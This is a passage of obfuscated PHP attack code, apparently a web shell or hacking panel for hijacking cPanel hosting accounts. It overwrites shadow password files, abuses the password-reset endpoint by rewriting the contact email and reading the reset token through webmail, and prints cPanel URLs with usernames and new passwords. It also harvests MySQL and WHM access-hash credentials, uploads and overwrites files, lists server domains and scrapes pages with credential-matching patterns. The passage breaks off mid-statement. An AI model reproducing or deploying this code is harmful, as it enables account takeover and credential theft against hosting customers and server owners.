@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/cur"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/new"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/tmp"); su59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-acl-list", $GLOBALS[ð][0x2]); su59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-uidlist", $GLOBALS[ð][0x1f4]); sU59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-uidvalidity", $GLOBALS[ð][0x1fa]); Su59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-uidvalidity.5e196afc", $GLOBALS[ð][0x2]); SU59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot.index.log", $GLOBALS[ð][0x2]); sU59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot.list.index.log", $GLOBALS[ð][0x2]); Su59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot.mailbox.log", $GLOBALS[ð][0x2]); SU59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/maildirsize", $GLOBALS[ð][0x219]); sU59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/subscriptions", $GLOBALS[ð][0x1f3]); $GMTKc = $stR_2 . $GLOBALS[ð][0x7e] . $ACEox . $GLOBALS[ð][0x21a] . $GLOBALS[ð][0x21b]; if (file_exists($uU2VV)) { $Wu7is = $GLOBALS[ð][0x2]; $t08MP = UFEQC($uU2VV); if (!strstr($t08MP, $USGuv . $GLOBALS[ð][0x1f0])) { $Wu7is .= $GLOBALS[ð][0x1f1] . $USGuv . $GLOBALS[ð][0x1f2]; } $Wu7is .= $GMTKc; $Wu7is .= $t08MP; SU59q($uU2VV, $Wu7is); } if (file_exists($QQ8bf)) { $Wu7is = $GLOBALS[ð][0x2]; $t08MP = UFeQC($QQ8bf); if (!strstr($t08MP, $USGuv . $GLOBALS[ð][0x1f0])) { $Wu7is .= $GLOBALS[ð][0x1f1] . $USGuv . $GLOBALS[ð][0x1f5]; } $Wu7is .= $GMTKc; $Wu7is .= $t08MP; sU59Q($QQ8bf, $Wu7is); } else { $Wu7is = $GLOBALS[ð][0x2]; $t08MP = $GLOBALS[ð][0x2]; $Wu7is .= $GLOBALS[ð][0x1f6] . $USGuv . $GLOBALS[ð][0x1f7]; $Wu7is .= $GMTKc; su59Q($QQ8bf, $Wu7is); } $dr_Lq = "{$stR_2}@{$USGuv}|{$tLGR8}"; echo "<smtp><domain>Domian => {$USGuv}</domain><port><br>Port => 587</port><smtpname><br>SMTPname => {$stR_2}</smtpname><password><br>Password => {$tLGR8}</password></smtp><br>\n"; return $stR_2; } function Kenwx($WnpSY, $tLGR8) { global $e6zLE; $Sxpg6 = array($GLOBALS[ð][0x89] => $WnpSY, $GLOBALS[ð][0x8a] => $tLGR8, $GLOBALS[ð][0x8b] => $GLOBALS[ð][0x8c]); $D_ctQ = sMvYq($e6zLE . $GLOBALS[ð][0x8d], null, $Sxpg6); if (preg_match($GLOBALS[ð][0x86], $D_ctQ) || preg_match($GLOBALS[ð][0x87], $D_ctQ) || preg_match($GLOBALS[ð][0x88], $D_ctQ)) { return !0; } return !1; } function aUM2F() { global $USGuv; global $WnpSY; global $GEgR8; if (uFEQC("/home{$GEgR8}{$WnpSY}/.my.cnf")) { $EKHbT = UFEQc("/home{$GEgR8}{$WnpSY}/.my.cnf"); preg_match($GLOBALS[ð][0x1b9], $EKHbT, $QObCn); preg_match($GLOBALS[ð][0x1b8], $EKHbT, $jPaTv); if (preg_match($GLOBALS[ð][0x1b7], $EKHbT)) { if (!empty($QObCn[0x1])) { $kLoFX = $QObCn[0x1]; } elseif (!empty($jPaTv[0x1])) { $kLoFX = $jPaTv[0x1]; } if (isset($kLoFX)) { if (kenwX($WnpSY, $kLoFX) == !0) { echo "\n<br><cpanel>https://{$USGuv}:2083|{$WnpSY}|{$kLoFX}</cpanel>"; } } } } } function rrMp2($my6fw) { global $WnpSY; global $GEgR8; global $e6zLE; global $t08MP; SU59q("/home{$GEgR8}{$WnpSY}/.contactemail", $my6fw); su59q("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo", $GLOBALS[ð][0x2f] . $my6fw); $DInZ0 = array($GLOBALS[ð][0x3b] => $WnpSY, $GLOBALS[ð][0x3c] => $GLOBALS[ð][0x3d]); $D_ctQ = sMvYQ("{$e6zLE}/resetpass", null, $DInZ0); if (preg_match($GLOBALS[ð][0x30], $D_ctQ)) { if (isset($t08MP)) { f6uQd(); } aum2f(); unlink($GLOBALS[ð][0x32]); die($GLOBALS[ð][0x31]); } $IQVSV = array($GLOBALS[ð][0x33] => $GLOBALS[ð][0x34], $GLOBALS[ð][0x35] => $WnpSY, $GLOBALS[ð][0x36] => $my6fw, $GLOBALS[ð][0x37] => $GLOBALS[ð][0x2], $GLOBALS[ð][0x38] => $my6fw, $GLOBALS[ð][0x39] => $GLOBALS[ð][0x3a]); $BZKHp = smvYQ("{$e6zLE}/resetpass", null, $IQVSV); if (preg_match($GLOBALS[ð][0x3e], $BZKHp)) { unlink("/home{$GEgR8}{$WnpSY}/.contactemail"); unlink("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo"); sU59q("/home{$GEgR8}{$WnpSY}/.contactemail", $my6fw); chmod("/home{$GEgR8}{$WnpSY}/.contactemail", 0600); $BZKHp = sMvYq("{$e6zLE}/resetpass", null, $IQVSV); } if (preg_match($GLOBALS[ð][0x2e], $BZKHp)) { return !1; } return !0; } function i7GRf($e20Gs) { sleep(0x7); $Z3hyF = 0; $M34yy = scandir($e20Gs); foreach ($M34yy as $FcCNX) { if ($FcCNX != $GLOBALS[ð][0xd1] && $FcCNX != $GLOBALS[ð][0xd2] && $FcCNX != $GLOBALS[ð][0xd3]) { $Z3hyF++; $DBsEl = ufeQC($e20Gs . $GLOBALS[ð][0x85] . $FcCNX); if (preg_match($GLOBALS[ð][0xd4], $DBsEl, $bjkID)) { $SSP9u = $bjkID[0x1]; } } } if (empty($SSP9u) && $Z3hyF > 0) { global $dr_Lq; global $IyBvl; $dr_Lq = explode($GLOBALS[ð][0xc0], $dr_Lq); $my6fw = $dr_Lq[0]; $tLGR8 = $dr_Lq[0x1]; $Bbpdj = array($GLOBALS[ð][0xcd] => $my6fw, $GLOBALS[ð][0xce] => $tLGR8, $GLOBALS[ð][0xcf] => $GLOBALS[ð][0xd0]); $nAXqQ = sMVyq("{$IyBvl}/login/", null, $Bbpdj); if (preg_match($GLOBALS[ð][0xc1], $nAXqQ)) { if (preg_match($GLOBALS[ð][0xc2], $nAXqQ, $MqnST)) { $MqnST = $MqnST[0x1]; } elseif (preg_match($GLOBALS[ð][0xc3], $nAXqQ, $MqnST)) { $MqnST = $MqnST[0x1]; } elseif (preg_match($GLOBALS[ð][0xc4], $nAXqQ, $MqnST)) { $MqnST = $MqnST[0x1]; } elseif (preg_match($GLOBALS[ð][0xc5], $nAXqQ, $MqnST)) { $MqnST = $MqnST[0x1]; } elseif (preg_match($GLOBALS[ð][0xc6], $nAXqQ, $MqnST)) { $MqnST = $MqnST[0x1]; } elseif (preg_match($GLOBALS[ð][0xc7], $nAXqQ, $MqnST)) { $MqnST = $MqnST[0x1]; } elseif (preg_match($GLOBALS[ð][0xc8], $nAXqQ, $MqnST)) { $MqnST = $MqnST[0x1]; } else { aUM2F(); f6uqd(); unlink($GLOBALS[ð][0xca]); die($GLOBALS[ð][0xc9]); } $UwF6G = SMvYQ("{$IyBvl}/{$MqnST}/3rdparty/roundcube/"); $dVuXE = smVYQ("{$IyBvl}/{$MqnST}/3rdparty/roundcube/?_uid=1&_action=show"); if (preg_match($GLOBALS[ð][0xcb], $dVuXE, $bjkID)) { $SSP9u = $bjkID[0x1]; } else { $dVuXE = SMVYq("{$IyBvl}/{$MqnST}/3rdparty/roundcube/?_uid=2&_action=show"); if (preg_match($GLOBALS[ð][0xcc], $dVuXE, $bjkID)) { $SSP9u = $bjkID[0x1]; } } } } if (empty($SSP9u)) { AUM2f(); f6Uqd(); unlink($GLOBALS[ð][0xd6]); die($GLOBALS[ð][0xd5]); } return $SSP9u; } function Gh_rF($e20Gs = null) { global $WnpSY; global $USGuv; global $e6zLE; if ($e20Gs == null) { $SSP9u = trim($_POST[$GLOBALS[ð][0xbf]]); } else { $SSP9u = i7gRF($e20Gs); } $PJswN = array($GLOBALS[ð][0xb1] => $WnpSY, $GLOBALS[ð][0xb2] => $GLOBALS[ð][0xb3], $GLOBALS[ð][0xb4] => $GLOBALS[ð][0x2], $GLOBALS[ð][0xb5] => $SSP9u); $DZZzM = SmVyq("{$e6zLE}/resetpass", null, $PJswN); $kpaoN = cQXaS(); $su69k = array($GLOBALS[ð][0xb6] => $GLOBALS[ð][0xb7], $GLOBALS[ð][0xb8] => $WnpSY, $GLOBALS[ð][0xb9] => $kpaoN, $GLOBALS[ð][0xba] => $GLOBALS[ð][0xbb], $GLOBALS[ð][0xbc] => $GLOBALS[ð][0xbd], $GLOBALS[ð][0xbe] => $kpaoN); $gZVpq = SMvyq("{$e6zLE}/resetpass", null, $su69k); echo "<cpanel>https://{$USGuv}:2083|{$WnpSY}|{$kpaoN}</cpanel><br>\n"; } function j91UX($stR_2 = null) { global $GEgR8; global $WnpSY; global $USGuv; if (isset($_POST[$GLOBALS[ð][0x28]])) { rrMp2(trim($_POST[$GLOBALS[ð][0x29]])); exit(0); } elseif (isset($_POST[$GLOBALS[ð][0x2a]])) { gh_Rf(); unlink("/home{$GEgR8}{$WnpSY}/.contactemail"); unlink("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo"); unlink($GLOBALS[ð][0x2b]); exit(0); } if (rrmp2("{$stR_2}@{$USGuv}") == !1) { aum2f(); f6Uqd(); unlink($GLOBALS[ð][0x2c]); die($GLOBALS[ð][0x2d]); } Gh_rf("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/new"); f6UqD(); } function F6UQd() { global $t08MP; global $GEgR8; global $WnpSY; global $USGuv; $QQ8bf = "/home{$GEgR8}{$WnpSY}/etc/{$USGuv}/shadow"; $uU2VV = "/home{$GEgR8}{$WnpSY}/etc/shadow"; sU59q($QQ8bf, $t08MP); Su59Q($uU2VV, $t08MP); chmod($QQ8bf, 0640); chmod($uU2VV, 0640); unlink("/home{$GEgR8}{$WnpSY}/.contactemail"); unlink("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo"); } function UhztB($jpODZ) { global $FDWty; if (isset($_POST[$GLOBALS[ð][0x267]])) { rename(trim($_POST[$GLOBALS[ð][0x268]]), trim($_POST[$GLOBALS[ð][0x269]])); $i83r4 = trim($_POST[$GLOBALS[ð][0x26b]]); $cHB_F = PDWSI($i83r4, $GLOBALS[ð][0x26a]); chmod($i83r4, 0644); su59Q($i83r4, $cHB_F); exit; } $AX0EH = $_FILES[$GLOBALS[ð][0x265]][$GLOBALS[ð][0x274]]; if ($jpODZ == 0x1) { $u3Q11 = $FDWty . $_FILES[$GLOBALS[ð][0x26d]][$GLOBALS[ð][0x26e]]; } elseif ($jpODZ == 0x2) { $ya3mT = substr(str_shuffle($GLOBALS[ð][0x26f]), 0x2d); mkdir($ya3mT); sU59Q($ya3mT . $GLOBALS[ð][0x270], $GLOBALS[ð][0x271]); $u3Q11 = $ya3mT . $GLOBALS[ð][0x105] . $_FILES[$GLOBALS[ð][0x264]][$GLOBALS[ð][0x26e]]; } else { $u3Q11 = $_FILES[$GLOBALS[ð][0x272]][$GLOBALS[ð][0x273]]; } $kUkI7 = move_uploaded_file($AX0EH, $u3Q11); if (!$kUkI7) { $kUkI7 = copy($AX0EH, $u3Q11); } if ($kUkI7) { echo "<successfully>Uploaded successfully.</successfully>"; if ($jpODZ == 0x2) { echo "<br><folder>{$ya3mT}</folder>"; } } } function Wc4SH() { global $FDWty; $Etebm = $_POST[$GLOBALS[ð][0x21f]]; $CFDzr = 0; $Z0beW = array($FDWty . $GLOBALS[ð][0x21c], $FDWty . $GLOBALS[ð][0x21d], $FDWty . $GLOBALS[ð][0x21e]); foreach ($Z0beW as $oxb9V) { if (file_exists($oxb9V)) { $QCGIr = Su59q($oxb9V, $Etebm); if (!$QCGIr) { unlink($oxb9V); Su59q($oxb9V, $Etebm); } $CFDzr = 0x1; } } if ($CFDzr == 0) { foreach ($Z0beW as $oxb9V) { sU59q($oxb9V, $Etebm); } } echo "./Done"; } function ZX3AV($WnpSY, $vfUVq) { global $hEUZd; $vfUVq = str_replace($GLOBALS[ð][0x1], $GLOBALS[ð][0x2], $vfUVq); $VmjkA = array("Authorization:WHM {$WnpSY}:{$vfUVq}"); $D_ctQ = SMvyQ($hEUZd . $GLOBALS[ð][0x90], $VmjkA, null); if (preg_match($GLOBALS[ð][0x8e], $D_ctQ) || preg_match($GLOBALS[ð][0x8f], $D_ctQ)) { return !0; } return !1; } function rsq3X() { global $WnpSY; global $GEgR8; if (uFEQc($GLOBALS[ð][0x244])) { $ILX08 = uFeqc($GLOBALS[ð][0x245]); $ILX08 = explode($GLOBALS[ð][0x1], trim($ILX08)); foreach ($ILX08 as $MocnV) { $c7ie0 = explode($GLOBALS[ð][0x7e], $MocnV); $c7ie0 = $c7ie0[0]; if (uFeqc("/home{$GEgR8}{$c7ie0}/.accesshash")) { $vfUVq = UFEQc("/home{$GEgR8}{$c7ie0}/.accesshash"); $vfUVq = str_replace($GLOBALS[ð][0x3], $GLOBALS[ð][0x2], $vfUVq); if (ZX3aV($c7ie0, $vfUVq) == !0) { echo "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n"; } } } } if (UFeQc("/home{$GEgR8}{$WnpSY}/.accesshash")) { $vfUVq = ufEqc("/home{$GEgR8}{$WnpSY}/.accesshash"); $vfUVq = str_replace($GLOBALS[ð][0x1], $GLOBALS[ð][0x2], $vfUVq); if (ZX3av($WnpSY, $vfUVq) == !0) { echo "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n"; } } else { unlink("/home{$GEgR8}{$WnpSY}/.accesshash"); $LUpGY = substr(str_shuffle($GLOBALS[ð][0x248]), 0x3); Su59Q("/home{$GEgR8}{$WnpSY}/.accesshash", $LUpGY); chmod("/home{$GEgR8}{$WnpSY}/.accesshash", 0600); if (Zx3av($WnpSY, $vfUVq) == !0) { echo "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n"; } else { unlink("/home{$GEgR8}{$WnpSY}/.accesshash"); } } } function SWRgg() { global $WnpSY; global $GEgR8; if (UFEQc($GLOBALS[ð][0x4e])) { $MULSm = Ufeqc($GLOBALS[ð][0x51]); $MULSm = explode($GLOBALS[ð][0x3], trim($MULSm)); foreach ($MULSm as $MocnV) { $c7ie0 = explode($GLOBALS[ð][0x4f], $MocnV); $c7ie0 = $c7ie0[0]; if (UFeqc("/home{$GEgR8}{$c7ie0}/.my.cnf")) { echo "<font color=\"green\"><center>[+] mycnf </center> </font><br>"; } } } elseif (UfEQC("/home{$GEgR8}{$WnpSY}/.my.cnf")) { echo "<font color=\"green\"><center>[+] mycnf </center> </font><br>"; } } function UgUZa() { global $XG7BU; $kX5Kz = $GLOBALS[ð][0x4b] . $XG7BU; $aMb4b = fW1Ye($kX5Kz); $hs4Qn = json_decode($aMb4b)->{$GLOBALS[ð][0x4d]}; $Qczmw = json_decode($aMb4b)->{$GLOBALS[ð][0x4c]}; return array($hs4Qn, $Qczmw); } function YdVh6($jpODZ) { global $ACEox; global $GEgR8; global $WnpSY; global $XG7BU; global $USGuv; $Z3hyF = 0; echo "<ip>{$XG7BU}</ip>"; if (is_dir("/home{$GEgR8}{$WnpSY}/.cpanel")) { $rm7Yy = uFEqC($GLOBALS[ð][0x221]); if (!$rm7Yy) { echo "<error># can't ReaD -> [ /etc/named.conf ]</error>"; } preg_match_all($GLOBALS[ð][0x223], $rm7Yy, $zXPiY); $AnvGa = array_unique($zXPiY[0x1]); foreach ($AnvGa as $eRn5x) { $Z3hyF++; if ($jpODZ == 0x1) { echo "{$eRn5x}\n"; } } } elseif (preg_match("/{$USGuv}/", $ACEox)) { preg_match("#/(.*)\\/{$USGuv}/#", $ACEox, $SrYD9); $SrYD9 = $GLOBALS[ð][0x85] . $SrYD9[0x1]; $AnvGa = a7gCn("ls {$SrYD9} | grep '\\.'"); $hWl0Q = explode($GLOBALS[ð][0x3], $AnvGa); foreach ($hWl0Q as $eRn5x) { if (is_file($SrYD9 . $GLOBALS[ð][0x85] . $eRn5x)) { continue; } $Z3hyF++; if ($jpODZ == 0x1) { echo "{$eRn5x}\n"; } } if (!$AnvGa) { $AnvGa = scandir($SrYD9); foreach ($AnvGa as $eRn5x) { if (is_file($SrYD9 . $GLOBALS[ð][0x105] . $eRn5x) || !strstr($eRn5x, $GLOBALS[ð][0xd1])) { continue; } $Z3hyF++; if ($jpODZ == 0x1) { echo "{$eRn5x}\n"; } } } } else { echo "<error>can't get domains.</error>"; } return $Z3hyF; } function U0TK3() { global $x3Uog; global $ACEox; global $GEgR8; global $WnpSY; global $USGuv; global $XG7BU; $GYhUj = uGuZA(); echo $GLOBALS[ð][0x60] . phpversion() . $GLOBALS[ð][0x61]; echo $GLOBALS[ð][0x6d] . $USGuv . $GLOBALS[ð][0x6e]; echo $GLOBALS[ð][0x5a] . $XG7BU . $GLOBALS[ð][0x5b]; echo $GLOBALS[ð][0x5e] . $x3Uog . $GLOBALS[ð][0x5f]; echo $GLOBALS[ð][0x6f] . $ACEox . $GLOBALS[ð][0x70]; echo $GLOBALS[ð][0x64] . $GYhUj[0] . $GLOBALS[ð][0x65]; echo $GLOBALS[ð][0x5c] . $GYhUj[0x1] . $GLOBALS[ð][0x5d]; echo $GLOBALS[ð][0x62] . ydVh6(0) . $GLOBALS[ð][0x63]; if (preg_match($GLOBALS[ð][0x6a], $x3Uog)) { echo "<server><font color=\"red\"><center>[-] Windows</center> </font><br></server>"; } else { echo "<server><font color=\"green\"><center>[+] Linux</center> </font><br></server>"; } if (is_dir("/home{$GEgR8}{$WnpSY}/.cpanel")) { echo "<cp><font color=\"green\"><center>[+] cPanel</center> </font><br></cp>"; } elseif (preg_match($GLOBALS[ð][0x67], $ACEox)) { echo "<cp><font color=\"green\"><center>[+] vHosts</center> </font><br></cp>"; } else { echo "<cp><font color=\"red\"><center>[-] There is no cPanel or vHosts.</center> </font><br></cp>"; } } function emGki($QmcTU) { $mH9bZ = array($GLOBALS[ð][0x19c] => $GLOBALS[ð][0x47], $GLOBALS[ð][0x19d] => $GLOBALS[ð][0x19e], $GLOBALS[ð][0x19f] => $GLOBALS[ð][0x1a0], $GLOBALS[ð][0x1a1] => $GLOBALS[ð][0x1a2], $GLOBALS[ð][0x1a3] => $GLOBALS[ð][0x1a4], $GLOBALS[ð][0x1a5] => $GLOBALS[ð][0x1a6], $GLOBALS[ð][0x1a7] => $GLOBALS[ð][0x1a8], $GLOBALS[ð][0x1a9] => $GLOBALS[ð][0x1aa], $GLOBALS[ð][0x1ab] => $GLOBALS[ð][0x1ac], $GLOBALS[ð][0x1ad] => $GLOBALS[ð][0x1ae], $GLOBALS[ð][0x1a0] => $GLOBALS[ð][0x1a3], $GLOBALS[ð][0x1aa] => $GLOBALS[ð][0x19d], $GLOBALS[ð][0x1af] => $GLOBALS[ð][0x1a1], $GLOBALS[ð][0x1a6] => $GLOBALS[ð][0x1b0], $GLOBALS[ð][0x1b1] => $GLOBALS[ð][0x1b2], $GLOBALS[ð][0x1b3] => $GLOBALS[ð][0x1b4], $GLOBALS[ð][0x1ac] => $GLOBALS[ð][0x1b5]); $D6mgj = str_split($QmcTU); $e50EE = $GLOBALS[ð][0x2]; foreach ($D6mgj as $wOVBe) { if (in_array($wOVBe, $mH9bZ)) { $e50EE .= $mH9bZ[$wOVBe]; } else { $e50EE .= $wOVBe; } } return $e50EE; } function bWQLE() { $qdMec = 0; $ogEo3 = 0; $ubZRU = 0; $yp2PP = 0; $BU0zm = 0; $lQymy = 0; $LOmS0 = trim($_POST[$GLOBALS[ð][0x191]]); $Enic4 = fW1ye($LOmS0); if (preg_match($GLOBALS[ð][0x106], $Enic4)) { preg_match_all($GLOBALS[ð][0x107], $Enic4, $WHqbk); foreach ($WHqbk[0x1] as $Teaxm) { $ubZRU++; } if ($ubZRU > 0x190) { die($GLOBALS[ð][0x108]); } } preg_match_all($GLOBALS[ð][0x10c], $Enic4, $rPfM6); if (preg_match($GLOBALS[ð][0x109], $LOmS0)) { $zDvDR = str_replace($GLOBALS[ð][0x10a], $GLOBALS[ð][0x2], $LOmS0); } else { $zDvDR = str_replace($GLOBALS[ð][0x10b], $GLOBALS[ð][0x2], $LOmS0); } $zDvDR = substr($zDvDR, 0, strpos($zDvDR, $GLOBALS[ð][0x105])); foreach ($rPfM6[0x1] as $Rd6Xn) { $qdMec++; if (preg_match($GLOBALS[ð][0x133], $Rd6Xn) || preg_match($GLOBALS[ð][0x134], $Rd6Xn)) { $kX5Kz = $Rd6Xn . $GLOBALS[ð][0x135]; } elseif (preg_match($GLOBALS[ð][0x136], $Rd6Xn)) { $kX5Kz = $GLOBALS[ð][0x137] . $zDvDR . $Rd6Xn . $GLOBALS[ð][0x138]; } else { $kX5Kz = $LOmS0 . $Rd6Xn . $GLOBALS[ð][0x139]; } $srSx9 = htmlspecialchars_decode(Fw1Ye($kX5Kz)); preg_match($GLOBALS[ð][0x13d], $srSx9, $QObCn); preg_match($GLOBALS[ð][0x118], $srSx9, $jPaTv); preg_match($GLOBALS[ð][0x17c], $srSx9, $gBiec); preg_match($GLOBALS[ð][0x116], $srSx9, $pWfU0); preg_match($GLOBALS[ð][0x17e], $srSx9, $eBwm4); preg_match($GLOBALS[ð][0x120], $srSx9, $W_7qP); preg_match($GLOBALS[ð][0x115], $srSx9, $UYuN4); preg_match($GLOBALS[ð][0x142], $srSx9, $uXJkb); preg_match($GLOBALS[ð][0x12c], $srSx9, $VknFC); preg_match($GLOBALS[ð][0x13a], $srSx9, $zERE7); preg_match($GLOBALS[ð][0x130], $srSx9, $YhDxn); preg_match($GLOBALS[ð][0x12a], $srSx9, $rhB3r); preg_match_all($GLOBALS[ð][0x146], $srSx9, $NK16o); preg_match_all($GLOBALS[ð][0x110], $srSx9, $G2S_i); preg_match_all($GLOBALS[ð][0x113], $srSx9, $QO5g8); preg_match($GLOBALS[ð][0x144], $srSx9, $Jc7_H); preg_match($GLOBALS[ð][0x112], $srSx9, $fFreY); preg_match($GLOBALS[ð][0x132], $srSx9, $KK1cF); preg_match_all($GLOBALS[ð][0x17f], $srSx9, $vV_wN); preg_match($GLOBALS[ð][0x180], $srSx9, $VVbsx); preg_match($GLOBALS[ð][0x12b], $srSx9, $O0_Gw); preg_match($GLOBALS[ð][0x17d], $srSx9, $H3Dnq); preg_match($GLOBALS[ð][0x13e], $srSx9, $qRVjf); preg_match($GLOBALS[ð][0x111], $srSx9, $I1XA9); preg_match($GLOBALS[ð][0x13c], $srSx9, $EQ0fI); preg_match($GLOBALS[ð][0x13b], $srSx9, $owSpB); preg_match($GLOBALS[ð][0x114], $srSx9, $pmwNx); preg_match($GLOBALS[ð][0x143], $srSx9, $ow9vj); preg_match($GLOBALS[ð][0x12f], $srSx9, $l5zPA); preg_match($GLOBALS[ð][0x145], $srSx9, $KTQVw); preg_match($GLOBALS[ð][0x177], $srSx9, $oDKH4); preg_match($GLOBALS[ð][0x117], $srSx9, $eZeM_); preg_match($GLOBALS[ð][0x119], $srSx9, $MQNcp); preg_match($GLOBALS[ð][0x12d], $srSx9, $lMLuB); preg_match($GLOBALS[ð][0x190], $srSx9, $TqGXu); preg_match($GLOBALS[ð][0x131], $srSx9, $tB0uO); if (!empty($lMLuB[0x1]) && !preg_match($GLOBALS[ð][0x12e], $srSx9)) { $lQymy++; } elseif (!empty($TqGXu[0x1])) { $yp2PP++; } elseif (!empty($tB0uO[0x1])) { $BU0zm++; } if (!empty($QObCn[0x1])) { echo $GLOBALS[ð][0x147] . $QObCn[0x1] . $GLOBALS[ð][0x148]; $ogEo3++; } elseif (!empty($jPaTv[0x1])) { echo $GLOBALS[ð][0x149] . $jPaTv[0x1] . $GLOBALS[ð][0x14a]; $ogEo3++; } elseif (!empty($owSpB[0x1])) { echo $GLOBALS[ð][0x14b] . $owSpB[0x1] . $GLOBALS[ð][0x14c]; $ogEo3++; } elseif (!empty($gBiec[0x1])) { echo $GLOBALS[ð][0x14d] . $gBiec[0x1] . $GLOBALS[ð][0x14e]; $ogEo3++; } elseif (!empty($pWfU0[0x1])) { echo $GLOBALS[ð][0x14f] . $pWfU0[0x1] . $GLOBALS[ð][0x150]; $ogEo3++; } elseif (!empty($eBwm4[0x1])) { echo $GLOBALS[ð][0x151] . $eBwm4[0x1] . $GLOBALS[ð][0x152]; $ogEo3++; } elseif (!empty($W_7qP[0x1])) { echo $GLOBALS[ð][0x153] . $W_7qP[0x1] . $GLOBALS[ð][0x154]; $ogEo3++; } elseif (!empty($UYuN4[0x1])) { echo $GLOBALS[ð][0x155] . $UYuN4[0x1] . $GLOBALS[ð][0x156]; $ogEo3++; } elseif (!empty($m85ZG[0x1])) { echo $GLOBALS[ð][0x157] . $m85ZG[0x1] . $GLOBALS[ð][0x158]; $ogEo3++; } elseif (!empty($uXJkb[0x1])) { echo $GLOBALS[ð][0x159] . $uXJkb[0x1] . $GLOBALS[ð][0x15a]; $ogEo3++; } elseif (!empty($VknFC[0x1])) { echo $GLOBALS[ð][0x15b] . $VknFC[0x1] . $GLOBALS[ð][0x15c]; $ogEo3++; } elseif (!empty($zERE7[0x1])) { echo $GLOBALS[ð][0x15d] . $zERE7[0x1] . $GLOBALS[ð][0x15e]; $ogEo3++; } elseif (!empty($NK16o[0x1])) { foreach ($NK16o[0x1] as $Ez2Fk) { if (!($Ez2Fk == $GLOBALS[ð][0x15f])) { echo $GLOBALS[ð][0x160] . $Ez2Fk . $GLOBALS[ð][0x161]; $ogEo3++; } } } elseif (!empty($QO5g8[0x1])) { foreach ($QO5g8[0x1] as $Ez2Fk) { if (!($Ez2Fk == $GLOBALS[ð][0x162])) { echo $GLOBALS[ð][0x163] . $Ez2Fk . $GLOBALS[ð][0x164]; $ogEo3++; } } } elseif (!empty($Jc7_H[0x1])) { echo $GLOBALS[ð][0x165] . $Jc7_H[0x1] . $GLOBALS[ð][0x166]; $ogEo3++; } elseif (!empty($fFreY[0x1])) { echo $GLOBALS[ð][0x167] . $fFreY[0x1] . $GLOBALS[ð][0x168]; $ogEo3++; } elseif (!empty($KK1cF[0x1])) { echo $GLOBALS[ð][0x169] . $KK1cF[0x1] . $GLOBALS[ð][0x16a]; $ogEo3++; } elseif (!empty($VVbsx[0x1])) { echo $GLOBALS[ð][0x16b] . $VVbsx[0x1] . $GLOBALS[ð][0x16c]; $ogEo3++; } elseif (!empty($O0_Gw[0x1])) { echo $GLOBALS[ð][0x16d] . $O0_Gw[0x1] . $GLOBALS[ð][0x16e]; $ogEo3++; } elseif (!empty($vV_wN[0x1])) { echo $GLOBALS[ð][0x16f] . $vV_wN[0x1][0x1] . $GLOBALS[ð][0x170]; $ogEo3++; } elseif (!empty($O0_Gw[0x1])) { echo $GLOBALS[ð][0x171] . $O0_Gw[0x1] . $GLOBALS[ð][0x172]; $ogEo3++; } elseif (!empty($O0_Gw[0x1])) { echo $GLOBALS[ð][0x173] . $O0_Gw[0x1] . $GLOBALS[ð][0x174]; $ogEo3++; } elseif (!empty($pmwNx[0x1])) { echo $GLOBALS[ð][0x175] . $pmwNx[0x1] . $GLOBALS[ð][0x176]; $ogEo3++; } if (!empty($G2S_i[0x1])) { $Mo0Fh = $G2S_i[0x1][0x1]; preg_match_all($GLOBALS[ð][0x181], $Mo0Fh, $yz0ZU); $yz0ZU = $yz0ZU[0x1][0]; echo $GLOBALS[ð][0x182] . $yz0ZU . $GLOBALS[ð][0x183]; $ogEo3++; } if (!empty($I1XA9[0x1])) { echo $GLOBALS[ð][0x178] . $I1XA9[0x1] . $GLOBALS[ð][0x179]; $ogEo3++; } if (!empty($EQ0fI[0x1])) { echo $GLOBALS[ð][0x17a] . $EQ0fI[0x1] . $GLOBALS[ð][0x17b]; $ogEo3++; } if (preg_match($GLOBALS[ð][0x11a], $Rd6Xn) || preg_match($GLOBALS[ð][0x11b], $srSx9)) { if (!empty($H3Dnq[0x1])) { echo $GLOBALS[ð][0x11c] . $H3Dnq[0x1] . $GLOBALS[ð][0x11d]; $ogEo3++; } elseif (!empty($qRVjf[0x1])) { echo $GLOBALS[ð][0x11e] . $qRVjf[0x1] . $GLOBALS[ð][0x11f]; $ogEo3++; } } if (!empty($oDKH4[0x1]) && !preg_match($GLOBALS[ð][0x18a], $oDKH4[0x1])) { echo $GLOBALS[ð][0x18b] . $oDKH4[0x1] . $GLOBALS[ð][0x18c]; $ogEo3++; } elseif (!empty($ow9vj[0x1]) && !preg_match($GLOBALS[ð][0x18d], $ow9vj[0x1])) { echo $GLOBALS[ð][0x18e] . $ow9vj[0x1] . $GLOBALS[ð][0x18f]; $ogEo3++; } if (!empty($eZeM_[0x1]) && !preg_match($GLOBALS[ð][0x124], $eZeM_[0x1])) { echo $GLOBALS[ð][0x125] . $eZeM_[0x1] . $GLOBALS[ð][0x126]; $ogEo3++; } elseif (!empty($l5zPA[0x1]) && !preg_match($GLOBALS[ð][0x127], $l5zPA[0x1])) { echo $GLOBALS[ð][0x128] . $l5zPA[0x1] . $GLOBALS[ð][0x129]; $ogEo3++; } if (!empty($MQNcp[0x1]) && 